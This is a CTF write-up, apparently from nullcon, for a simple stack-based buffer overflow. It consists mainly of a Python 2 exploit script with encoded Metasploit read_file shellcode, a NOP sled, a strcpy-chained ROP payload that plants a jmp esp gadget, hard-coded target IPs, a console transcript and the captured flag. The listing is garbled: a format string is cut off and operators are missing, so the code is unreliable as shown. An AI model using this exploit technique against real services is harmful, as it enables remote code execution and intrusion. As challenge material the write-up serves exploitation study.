주제 : Simple stack-based buffer overflow
binary :
from socket import *
import struct
import time
# CTF write-up exploit listing (Python 2: `print` statement, `raw_input`), pasted
# here as a single collapsed line. Extraction damaged the text: the struct
# format string after `struct.pack(` is cut off, the `ip` variable is assigned
# twice in a row, and the long run of bare `payload = ...` statements cannot
# each be plain assignments — operators appear to have been stripped. The
# listing is therefore not runnable as shown and should be read only as a
# record of what the author did.
# Educator's notes, grounded in the text itself: the comment block identifies
# the shellcode as a Metasploit `linux/x86/read_file` payload with
# `PATH=flag.txt`, i.e. it reads the challenge flag on the target; the
# `recv`/`send`/`strcpy`/`freespace`/`pr` values are hard-coded 0x0804xxxx
# addresses for this specific binary, so they are only meaningful against the
# challenge build; the trailing docstring is the author's console transcript,
# whose last line matches the Flag value stated below the listing.
p = lambda x : struct.pack(" ip = "192.168.0.109" ip = "23.23.190.205" port = 6776 """ /* * linux/x86/read_file - 97 bytes * http://www.metasploit.com * Encoder: x86/shikata_ga_nai * VERBOSE=false, PrependSetresuid=false, * PrependSetreuid=false, PrependSetuid=false, * PrependSetresgid=false, PrependSetregid=false, * PrependSetgid=false, PrependChrootBreak=false, * AppendExit=false, PATH=flag.txt, FD=4 */ """ shellcode = ("\xb8\xf6\x7e\xa8\x82\xdd\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x12\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x14\x8b\x43\xb4\x60" "\x71\x94\xb9\x90\x21\xa5\x70\x5d\x55\x4c\x41\xe5\x55\x4f\x46" "\x15\xd3\xa8\xcf\xec\x59\x36\xc0\x0e\x9e\xfa\x60\x87\x5c\xbc" "\x65\x97\x60\xbd\xde\x93\x60\xbd\x20\x56\xe0\x05\x21\x68\xe1" "\x75\x99\x68\xe1\x75\xdd\xa5\x61\x9d\x18\xca\x9d\xa1\xc5\x58" "\x03\x39\x24\xd4\xbb\xb1\x38") shellcode = "\x90"*100 shellcode s = socket(AF_INET, SOCK_STREAM) s.connect((ip, port)) recv = 0x08048720 send = 0x08048750 strcpy = 0x08048640 freespace = 0x0804b301 pr = 0x08048b54 nnjesp = 0x9090ffe4 raw_input("go? ") payload = ":" payload = "A" * (0xdc - len(payload)) payload = "BBBB" payload = "\x0a" payload = p(strcpy) payload = p(pr-1) # ppr payload = p(freespace) payload = p(0x08048640) # 0xff payload = p(strcpy) payload = p(pr-1) # ppr payload = p(freespace 1) payload = p(0x08048766) # 0xe4 payload = p(strcpy) payload = p(pr-1) # ppr payload = p(freespace 2) payload = p(0x08048e57) # 0x90 payload = p(strcpy) payload = p(pr-1) # pppr payload = p(freespace 3) payload = p(0x08048e57) # 0x90 payload = p(freespace) # jmp esp payload = shellcode # <-- esp!! s.recv(1024) print "[*] Sending Exploit.." time.sleep(1) s.send(payload "\n") print "[*] cat key :D" time.sleep(1) print s.recv(1024) raw_input("> ") """ C:\Users\Administrator\Desktop\nullcon>ex2.py go? [*] Sending Exploit.. [*] cat key :D 6ffcffda1c58f6dbe4dcd5b715de538c > C:\Users\Administrator\Desktop\nullcon> """
바이너리에는 간단한 buffer overflow 취약점이 존재한다.
ASLR이 걸려 있다는 가정 하에 exploit 코드를 작성한다.
Flag : 6ffcffda1c58f6dbe4dcd5b715de538c